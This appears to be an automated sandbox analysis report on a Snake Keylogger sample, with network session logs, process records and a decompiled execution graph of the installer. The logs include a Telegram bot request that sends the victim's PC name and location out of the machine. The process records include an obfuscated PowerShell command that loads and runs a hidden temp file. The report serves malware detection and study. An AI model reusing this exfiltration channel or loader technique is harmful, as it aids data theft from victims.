                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=04Pas3g8e%2F0AGM%2FW0GCvwDkqjtLROYqOhnaUMaU1G%2Bvus6URgIQCMDdIVJTHrpCL9kNIy%2BQ%2BnOmRgDEOOETTBqgTnJUfq5pOCsObAN75KpqEcZR9dGufI2TqDN1ETXRIyH4c78B1"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 9000848d2b210f36-EWR
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1473&min_rtt=1464&rtt_var=567&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1899804&cwnd=231&unsent_bytes=0&cid=5ff29862b7ad2da9&ts=144&x=0"
                                                                                                                        2025-01-10 23:41:25 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        8192.168.2.1049982104.21.80.14438056C:\Users\user\AppData\Local\Temp\Bivejens.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 23:41:27 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                        Connection: Keep-Alive
                                                                                                                        2025-01-10 23:41:27 UTC857INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 23:41:27 GMT
                                                                                                                        Content-Type: text/xml
                                                                                                                        Content-Length: 362
                                                                                                                        Connection: close
                                                                                                                        Age: 1867276
                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                        cf-cache-status: HIT
                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V1KCWH8XyZt31qzaaBxy4wB9JTlLwRh%2Bg1IXF1XWomwX%2BJ0ix0K7LO9RAqMtJSaKi%2F5ddHi8Yb44tbVke00LxS0pU00CDRgSU5FbzAEGR87x4AlG4cqNVPyJzPEPCbvFv%2F0uYf7L"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 900084955bf643ee-EWR
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1735&min_rtt=1727&rtt_var=664&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1626740&cwnd=228&unsent_bytes=0&cid=5a263f13a77a4839&ts=138&x=0"
                                                                                                                        2025-01-10 23:41:27 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        9192.168.2.1049984104.21.80.14438056C:\Users\user\AppData\Local\Temp\Bivejens.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 23:41:28 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                        2025-01-10 23:41:28 UTC857INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 23:41:28 GMT
                                                                                                                        Content-Type: text/xml
                                                                                                                        Content-Length: 362
                                                                                                                        Connection: close
                                                                                                                        Age: 1867277
                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                        cf-cache-status: HIT
                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fRk4hzy6%2BtgHEEZwMGJ5OLTvq8Q9SnbmUhAc4c7eyIHzG7ymYMw0SFt3slDPtaCDUxXWB9gc7UwvgN%2BjmOk%2Bb%2FWSQEtUnzwQfemKurcWN7jUNQXwqsaA9jhcaqLq6Dn3eiQSBx3M"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 9000849dae2043ee-EWR
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1712&min_rtt=1711&rtt_var=643&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1698662&cwnd=228&unsent_bytes=0&cid=90ac68da05917d09&ts=170&x=0"
                                                                                                                        2025-01-10 23:41:28 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        10192.168.2.1049986104.21.80.14438056C:\Users\user\AppData\Local\Temp\Bivejens.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 23:41:29 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                        Connection: Keep-Alive
                                                                                                                        2025-01-10 23:41:30 UTC859INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 23:41:29 GMT
                                                                                                                        Content-Type: text/xml
                                                                                                                        Content-Length: 362
                                                                                                                        Connection: close
                                                                                                                        Age: 1867279
                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                        cf-cache-status: HIT
                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nUujR93XsmwrgMT7yQCjuVS1EkVTtsGdU6NSbLmtmXULDMCQQiqVzOsteR5oIWterrsiqNe0Juw6SyJ%2FI78sdAV%2BdNUjkjj0C8H0ViRNAlyEiF%2BQfa9tCY1G%2Fv%2BGasjB9APWqTRC"}],"group":"cf-nel","max_age":604800}
                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                        Server: cloudflare
                                                                                                                        CF-RAY: 900084a64df542d2-EWR
                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1571&min_rtt=1567&rtt_var=596&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1825000&cwnd=229&unsent_bytes=0&cid=0d5c48a01d6290d0&ts=152&x=0"
                                                                                                                        2025-01-10 23:41:30 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        11192.168.2.1049987149.154.167.2204438056C:\Users\user\AppData\Local\Temp\Bivejens.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 23:41:30 UTC345OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:813848%0D%0ADate%20and%20Time:%2011/01/2025%20/%2006:06:33%0D%0ACountry%20Name:%20United%20States%0D%0A[%20813848%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1
                                                                                                                        Host: api.telegram.org
                                                                                                                        Connection: Keep-Alive
                                                                                                                        2025-01-10 23:41:30 UTC344INHTTP/1.1 404 Not Found
                                                                                                                        Server: nginx/1.18.0
                                                                                                                        Date: Fri, 10 Jan 2025 23:41:30 GMT
                                                                                                                        Content-Type: application/json
                                                                                                                        Content-Length: 55
                                                                                                                        Connection: close
                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                        2025-01-10 23:41:30 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                        Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                        Click to jump to process

                                                                                                                        Click to jump to process

                                                                                                                        Click to dive into process behavior distribution

                                                                                                                        Click to jump to process

                                                                                                                        Target ID:0
                                                                                                                        Start time:18:40:39
                                                                                                                        Start date:10/01/2025
                                                                                                                        Path:C:\Users\user\Desktop\TjoY7n65om.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Users\user\Desktop\TjoY7n65om.exe"
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:825'542 bytes
                                                                                                                        MD5 hash:6A5B8C6057DFF681139FD609FFC6B21D
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:low
                                                                                                                        Has exited:true

                                                                                                                        Target ID:2
                                                                                                                        Start time:18:40:46
                                                                                                                        Start date:10/01/2025
                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"powershell.exe" -windowstyle minimized "$Fuffy=Get-Content -Raw 'C:\Users\user\AppData\Local\Temp\depersonaliseredes\Thalamiflorous.Tus209';$Antigenes=$Fuffy.SubString(5130,3);.$Antigenes($Fuffy)"
                                                                                                                        Imagebase:0xbf0000
                                                                                                                        File size:433'152 bytes
                                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high
                                                                                                                        Has exited:true

                                                                                                                        Target ID:3
                                                                                                                        Start time:18:40:46
                                                                                                                        Start date:10/01/2025
                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        Imagebase:0x7ff620390000
                                                                                                                        File size:862'208 bytes
                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high
                                                                                                                        Has exited:true

                                                                                                                        Target ID:5
                                                                                                                        Start time:18:41:09
                                                                                                                        Start date:10/01/2025
                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\Bivejens.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\Bivejens.exe"
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:825'542 bytes
                                                                                                                        MD5 hash:6A5B8C6057DFF681139FD609FFC6B21D
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.2610716890.000000001E6C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        Antivirus matches:
                                                                                                                        • Detection: 50%, ReversingLabs
                                                                                                                        • Detection: 65%, Virustotal, Browse
                                                                                                                        Reputation:low
                                                                                                                        Has exited:false

                                                                                                                        Reset < >

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:22.5%
                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                          Signature Coverage:21.3%
                                                                                                                          Total number of Nodes:1327
                                                                                                                          Total number of Limit Nodes:35
                                                                                                                          execution_graph 3131 4015c1 3151 402c41 3131->3151 3135 401631 3137 401663 3135->3137 3138 401636 3135->3138 3140 401423 24 API calls 3137->3140 3167 401423 3138->3167 3149 40165b 3140->3149 3145 40164a SetCurrentDirectoryW 3145->3149 3146 4015d1 3146->3135 3147 401617 GetFileAttributesW 3146->3147 3148 4015fa 3146->3148 3163 405b86 3146->3163 3171 405855 3146->3171 3179 405838 CreateDirectoryW 3146->3179 3147->3146 3148->3146 3174 4057bb CreateDirectoryW 3148->3174 3152 402c4d 3151->3152 3182 4062a6 3152->3182 3155 4015c8 3157 405c04 CharNextW CharNextW 3155->3157 3158 405c21 3157->3158 3161 405c33 3157->3161 3160 405c2e CharNextW 3158->3160 3158->3161 3159 405c57 3159->3146 3160->3159 3161->3159 3162 405b86 CharNextW 3161->3162 3162->3161 3164 405b8c 3163->3164 3165 405ba2 3164->3165 3166 405b93 CharNextW 3164->3166 3165->3146 3166->3164 3220 4052ec 3167->3220 3170 406284 lstrcpynW 3170->3145 3231 40665e GetModuleHandleA 3171->3231 3175 405808 3174->3175 3176 40580c GetLastError 3174->3176 3175->3148 3176->3175 3177 40581b SetFileSecurityW 3176->3177 3177->3175 3178 405831 GetLastError 3177->3178 3178->3175 3180 405848 3179->3180 3181 40584c GetLastError 3179->3181 3180->3146 3181->3180 3186 4062b3 3182->3186 3183 4064fe 3184 402c6e 3183->3184 3215 406284 lstrcpynW 3183->3215 3184->3155 3199 406518 3184->3199 3186->3183 3187 4064cc lstrlenW 3186->3187 3189 4062a6 10 API calls 3186->3189 3192 4063e1 GetSystemDirectoryW 3186->3192 3193 4063f4 GetWindowsDirectoryW 3186->3193 3194 406518 5 API calls 3186->3194 3195 4062a6 10 API calls 3186->3195 3196 40646f lstrcatW 3186->3196 3197 406428 SHGetSpecialFolderLocation 3186->3197 3208 406152 3186->3208 3213 4061cb wsprintfW 3186->3213 3214 406284 lstrcpynW 3186->3214 3187->3186 3189->3187 3192->3186 3193->3186 3194->3186 3195->3186 3196->3186 3197->3186 3198 406440 SHGetPathFromIDListW CoTaskMemFree 3197->3198 3198->3186 3206 406525 3199->3206 3200 4065a0 CharPrevW 3203 40659b 3200->3203 3201 40658e CharNextW 3201->3203 3201->3206 3202 405b86 CharNextW 3202->3206 3203->3200 3204 4065c1 3203->3204 3204->3155 3205 40657a CharNextW 3205->3206 3206->3201 3206->3202 3206->3203 3206->3205 3207 406589 CharNextW 3206->3207 3207->3201 3216 4060f1 3208->3216 3211 4061b6 3211->3186 3212 406186 RegQueryValueExW RegCloseKey 3212->3211 3213->3186 3214->3186 3215->3184 3217 406100 3216->3217 3218 406104 3217->3218 3219 406109 RegOpenKeyExW 3217->3219 3218->3211 3218->3212 3219->3218 3222 405307 3220->3222 3230 401431 3220->3230 3221 405323 lstrlenW 3224 405331 lstrlenW 3221->3224 3225 40534c 3221->3225 3222->3221 3223 4062a6 17 API calls 3222->3223 3223->3221 3226 405343 lstrcatW 3224->3226 3224->3230 3227 405352 SetWindowTextW 3225->3227 3228 40535f 3225->3228 3226->3225 3227->3228 3229 405365 SendMessageW SendMessageW SendMessageW 3228->3229 3228->3230 3229->3230 3230->3170 3232 406684 GetProcAddress 3231->3232 3233 40667a 3231->3233 3234 40585c 3232->3234 3237 4065ee GetSystemDirectoryW 3233->3237 3234->3146 3236 406680 3236->3232 3236->3234 3238 406610 wsprintfW LoadLibraryExW 3237->3238 3238->3236 4025 404a42 4026 404a52 4025->4026 4027 404a6e 4025->4027 4036 4058ce GetDlgItemTextW 4026->4036 4029 404aa1 4027->4029 4030 404a74 SHGetPathFromIDListW 4027->4030 4032 404a8b SendMessageW 4030->4032 4033 404a84 4030->4033 4031 404a5f SendMessageW 4031->4027 4032->4029 4034 40140b 2 API calls 4033->4034 4034->4032 4036->4031 4044 406fc4 4046 406812 4044->4046 4045 40717d 4046->4045 4046->4046 4047 406893 GlobalFree 4046->4047 4048 40689c GlobalAlloc 4046->4048 4049 406913 GlobalAlloc 4046->4049 4050 40690a GlobalFree 4046->4050 4047->4048 4048->4045 4048->4046 4049->4045 4049->4046 4050->4049 4051 401e49 4052 402c1f 17 API calls 4051->4052 4053 401e4f 4052->4053 4054 402c1f 17 API calls 4053->4054 4055 401e5b 4054->4055 4056 401e72 EnableWindow 4055->4056 4057 401e67 ShowWindow 4055->4057 4058 402ac5 4056->4058 4057->4058 4059 40264a 4060 402c1f 17 API calls 4059->4060 4062 402659 4060->4062 4061 402796 4062->4061 4063 4026a3 ReadFile 4062->4063 4064 405dfd ReadFile 4062->4064 4066 4026e3 MultiByteToWideChar 4062->4066 4067 402798 4062->4067 4069 402709 SetFilePointer MultiByteToWideChar 4062->4069 4070 4027a9 4062->4070 4072 405e5b SetFilePointer 4062->4072 4063->4061 4063->4062 4064->4062 4066->4062 4081 4061cb wsprintfW 4067->4081 4069->4062 4070->4061 4071 4027ca SetFilePointer 4070->4071 4071->4061 4073 405e77 4072->4073 4080 405e8f 4072->4080 4074 405dfd ReadFile 4073->4074 4075 405e83 4074->4075 4076 405ec0 SetFilePointer 4075->4076 4077 405e98 SetFilePointer 4075->4077 4075->4080 4076->4080 4077->4076 4078 405ea3 4077->4078 4079 405e2c WriteFile 4078->4079 4079->4080 4080->4062 4081->4061 3469 4014cb 3470 4052ec 24 API calls 3469->3470 3471 4014d2 3470->3471 4089 4016cc 4090 402c41 17 API calls 4089->4090 4091 4016d2 GetFullPathNameW 4090->4091 4094 4016ec 4091->4094 4098 40170e 4091->4098 4092 401723 GetShortPathNameW 4093 402ac5 4092->4093 4095 4065c7 2 API calls 4094->4095 4094->4098 4096 4016fe 4095->4096 4096->4098 4099 406284 lstrcpynW 4096->4099 4098->4092 4098->4093 4099->4098 3555 40234e 3556 402c41 17 API calls 3555->3556 3557 40235d 3556->3557 3558 402c41 17 API calls 3557->3558 3559 402366 3558->3559 3560 402c41 17 API calls 3559->3560 3561 402370 GetPrivateProfileStringW 3560->3561 4100 401b53 4101 402c41 17 API calls 4100->4101 4102 401b5a 4101->4102 4103 402c1f 17 API calls 4102->4103 4104 401b63 wsprintfW 4103->4104 4105 402ac5 4104->4105 4106 401956 4107 402c41 17 API calls 4106->4107 4108 40195d lstrlenW 4107->4108 4109 402592 4108->4109 4110 4014d7 4111 402c1f 17 API calls 4110->4111 4112 4014dd Sleep 4111->4112 4114 402ac5 4112->4114 4115 401f58 4116 402c41 17 API calls 4115->4116 4117 401f5f 4116->4117 4118 4065c7 2 API calls 4117->4118 4119 401f65 4118->4119 4121 401f76 4119->4121 4122 4061cb wsprintfW 4119->4122 4122->4121 3683 403359 SetErrorMode GetVersion 3684 403398 3683->3684 3685 40339e 3683->3685 3686 40665e 5 API calls 3684->3686 3687 4065ee 3 API calls 3685->3687 3686->3685 3688 4033b4 lstrlenA 3687->3688 3688->3685 3689 4033c4 3688->3689 3690 40665e 5 API calls 3689->3690 3691 4033cb 3690->3691 3692 40665e 5 API calls 3691->3692 3693 4033d2 3692->3693 3694 40665e 5 API calls 3693->3694 3695 4033de #17 OleInitialize SHGetFileInfoW 3694->3695 3773 406284 lstrcpynW 3695->3773 3698 40342a GetCommandLineW 3774 406284 lstrcpynW 3698->3774 3700 40343c 3701 405b86 CharNextW 3700->3701 3702 403461 CharNextW 3701->3702 3703 40358b GetTempPathW 3702->3703 3710 40347a 3702->3710 3775 403328 3703->3775 3705 4035a3 3706 4035a7 GetWindowsDirectoryW lstrcatW 3705->3706 3707 4035fd DeleteFileW 3705->3707 3711 403328 12 API calls 3706->3711 3785 402edd GetTickCount GetModuleFileNameW 3707->3785 3708 405b86 CharNextW 3708->3710 3710->3708 3715 403574 3710->3715 3718 403576 3710->3718 3713 4035c3 3711->3713 3712 403611 3716 4036b4 3712->3716 3721 405b86 CharNextW 3712->3721 3769 4036c4 3712->3769 3713->3707 3714 4035c7 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3713->3714 3719 403328 12 API calls 3714->3719 3715->3703 3813 403974 3716->3813 3869 406284 lstrcpynW 3718->3869 3720 4035f5 3719->3720 3720->3707 3720->3769 3738 403630 3721->3738 3725 4037fe 3727 403882 ExitProcess 3725->3727 3728 403806 GetCurrentProcess OpenProcessToken 3725->3728 3726 4036de 3729 4058ea MessageBoxIndirectW 3726->3729 3730 403852 3728->3730 3731 40381e LookupPrivilegeValueW AdjustTokenPrivileges 3728->3731 3735 4036ec ExitProcess 3729->3735 3737 40665e 5 API calls 3730->3737 3731->3730 3733 4036f4 3736 405855 5 API calls 3733->3736 3734 40368e 3870 405c61 3734->3870 3741 4036f9 lstrcatW 3736->3741 3742 403859 3737->3742 3738->3733 3738->3734 3743 403715 lstrcatW lstrcmpiW 3741->3743 3744 40370a lstrcatW 3741->3744 3745 40386e ExitWindowsEx 3742->3745 3748 40387b 3742->3748 3747 403731 3743->3747 3743->3769 3744->3743 3745->3727 3745->3748 3750 403736 3747->3750 3751 40373d 3747->3751 3752 40140b 2 API calls 3748->3752 3749 4036a9 3885 406284 lstrcpynW 3749->3885 3754 4057bb 4 API calls 3750->3754 3755 405838 2 API calls 3751->3755 3752->3727 3756 40373b 3754->3756 3757 403742 SetCurrentDirectoryW 3755->3757 3756->3757 3758 403752 3757->3758 3759 40375d 3757->3759 3893 406284 lstrcpynW 3758->3893 3894 406284 lstrcpynW 3759->3894 3762 4062a6 17 API calls 3763 40379c DeleteFileW 3762->3763 3764 4037a9 CopyFileW 3763->3764 3768 40376b 3763->3768 3764->3768 3765 4037f2 3767 40604a 36 API calls 3765->3767 3767->3769 3768->3762 3768->3765 3770 4062a6 17 API calls 3768->3770 3771 40586d 2 API calls 3768->3771 3772 4037dd CloseHandle 3768->3772 3895 40604a MoveFileExW 3768->3895 3886 40389a 3769->3886 3770->3768 3771->3768 3772->3768 3773->3698 3774->3700 3776 406518 5 API calls 3775->3776 3777 403334 3776->3777 3778 40333e 3777->3778 3779 405b59 3 API calls 3777->3779 3778->3705 3780 403346 3779->3780 3781 405838 2 API calls 3780->3781 3782 40334c 3781->3782 3899 405da9 3782->3899 3903 405d7a GetFileAttributesW CreateFileW 3785->3903 3787 402f1d 3806 402f2d 3787->3806 3904 406284 lstrcpynW 3787->3904 3789 402f43 3905 405ba5 lstrlenW 3789->3905 3793 402f54 GetFileSize 3794 403050 3793->3794 3812 402f6b 3793->3812 3910 402e79 3794->3910 3796 403059 3798 403089 GlobalAlloc 3796->3798 3796->3806 3922 403311 SetFilePointer 3796->3922 3797 4032fb ReadFile 3797->3812 3921 403311 SetFilePointer 3798->3921 3799 4030bc 3803 402e79 6 API calls 3799->3803 3802 4030a4 3805 403116 35 API calls 3802->3805 3803->3806 3804 403072 3807 4032fb ReadFile 3804->3807 3810 4030b0 3805->3810 3806->3712 3809 40307d 3807->3809 3808 402e79 6 API calls 3808->3812 3809->3798 3809->3806 3810->3806 3810->3810 3811 4030ed SetFilePointer 3810->3811 3811->3806 3812->3794 3812->3797 3812->3799 3812->3806 3812->3808 3814 40665e 5 API calls 3813->3814 3815 403988 3814->3815 3816 4039a0 3815->3816 3817 40398e 3815->3817 3818 406152 3 API calls 3816->3818 3931 4061cb wsprintfW 3817->3931 3819 4039d0 3818->3819 3820 4039ef lstrcatW 3819->3820 3822 406152 3 API calls 3819->3822 3823 40399e 3820->3823 3822->3820 3923 403c4a 3823->3923 3826 405c61 18 API calls 3827 403a21 3826->3827 3828 403ab5 3827->3828 3830 406152 3 API calls 3827->3830 3829 405c61 18 API calls 3828->3829 3831 403abb 3829->3831 3832 403a53 3830->3832 3833 403acb LoadImageW 3831->3833 3836 4062a6 17 API calls 3831->3836 3832->3828 3840 403a74 lstrlenW 3832->3840 3844 405b86 CharNextW 3832->3844 3834 403b71 3833->3834 3835 403af2 RegisterClassW 3833->3835 3839 40140b 2 API calls 3834->3839 3837 403b7b 3835->3837 3838 403b28 SystemParametersInfoW CreateWindowExW 3835->3838 3836->3833 3837->3769 3838->3834 3843 403b77 3839->3843 3841 403a82 lstrcmpiW 3840->3841 3842 403aa8 3840->3842 3841->3842 3845 403a92 GetFileAttributesW 3841->3845 3846 405b59 3 API calls 